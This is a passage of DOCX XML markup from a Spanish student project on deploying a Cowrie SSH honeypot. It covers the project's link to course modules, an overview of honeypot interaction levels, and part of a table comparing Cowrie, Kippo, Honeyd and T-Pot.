            <w:tcW w:type="pct" w:w="2900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Documentación técnica en inglés (Cowrie, MITRE ATT&amp;CK, informes de amenazas de Kaspersky y SANS) y redacción del Abstract.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1350"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Digitalización Aplicada a los Sectores Productivos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Uso de servicios cloud, automatización del despliegue con scripts y del análisis con Python.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1350"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Sostenibilidad Aplicada al Sistema Productivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Dimensionado ajustado a la carga real y eliminación del servidor al terminar la captura, sin recursos ociosos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Baja</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1350"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Itinerario Personal para la Empleabilidad I y II</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Proyecto orientado a perfiles de analista SOC y administración de sistemas, con repositorio público como portafolio profesional.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:before="60" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tabla 1. Relación del proyecto con los módulos profesionales del ciclo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Estado de la Cuestión</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Los honeypots son una herramienta consolidada en el ámbito de la ciberseguridad defensiva. El concepto fue formalizado por Lance Spitzner a principios de los años 2000, y desde entonces ha evolucionado significativamente en sofisticación y diversidad. Se clasifican habitualmente por su nivel de interacción:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Baja interacción: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">simulan únicamente puertos abiertos y respuestas básicas de protocolo (p. ej., Honeyd, Dionaea). Capturan datos limitados —fundamentalmente IPs de origen y puertos escaneados— pero son triviales de desplegar y presentan un riesgo mínimo, ya que no ofrecen ningún acceso real al atacante.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Media interacción: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">emulan un servicio completo, incluyendo autenticación, un entorno de comandos limitado y un filesystem simulado (p. ej., Cowrie, Kippo). Ofrecen un equilibrio óptimo entre la cantidad de datos capturados y el riesgo asumido, permitiendo observar el comportamiento del atacante después de la autenticación sin exponer un sistema real.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Alta interacción: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">proporcionan un sistema operativo real al atacante, generalmente mediante máquinas virtuales o contenedores aislados (p. ej., HonSSH combinado con VM, Cowrie con proxy a backend real). Capturan la mayor cantidad de datos posible, incluyendo binarios compilados por el atacante y técnicas de post-explotación completas, pero requieren un aislamiento riguroso y una monitorización constante para evitar que el sistema comprometido se utilice como plataforma de ataque.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">En la literatura académica, estudios como los de Provos y Holz (2007) en «Virtual Honeypots» y los informes periódicos del proyecto Honeynet demuestran el valor de los honeypots como fuente de inteligencia de amenazas. Investigaciones recientes (2023-2024) publican análisis similares al propuesto en este proyecto, confirmando que los patrones de ataque SSH se mantienen notablemente estables: las mismas credenciales triviales (root/123456, admin/admin) y los mismos comandos de reconocimiento se observan año tras año, lo que sugiere que una proporción significativa de los ataques los realizan botnets con scripts automatizados y poco sofisticados.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cowrie es el honeypot SSH/Telnet de media interacción más utilizado en la comunidad de ciberseguridad. Desarrollado en Python y mantenido activamente en GitHub con una comunidad de contribuidores activa, permite registrar credenciales probadas, comandos ejecutados, ficheros descargados e incluso grabar sesiones TTY completas. Su formato de salida JSON facilita el procesamiento automatizado y la integración con SIEMs como Wazuh, ELK o Splunk. Cowrie hereda la base de Kippo pero supera ampliamente sus capacidades, incluyendo soporte para sftp, ejecución en Docker y un sistema extensible de plugins de salida.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Comparativa Razonada</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Para seleccionar la herramienta central del proyecto se evaluaron cuatro alternativas, considerando criterios de funcionalidad, requisitos de recursos y adecuación al entorno disponible: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588"/>
        <w:gridCol w:w="1588"/>
        <w:gridCol w:w="1588"/>
        <w:gridCol w:w="1588"/>
        <w:gridCol w:w="1588"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Criterio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Cowrie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Kippo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Honeyd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T-Pot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Nivel de interacción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Baja</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Multi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Mantenimiento activo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">No (abandonado)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Limitado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">RAM mínima</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">512 MB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">256 MB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">128 MB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">8 GB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Captura comandos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
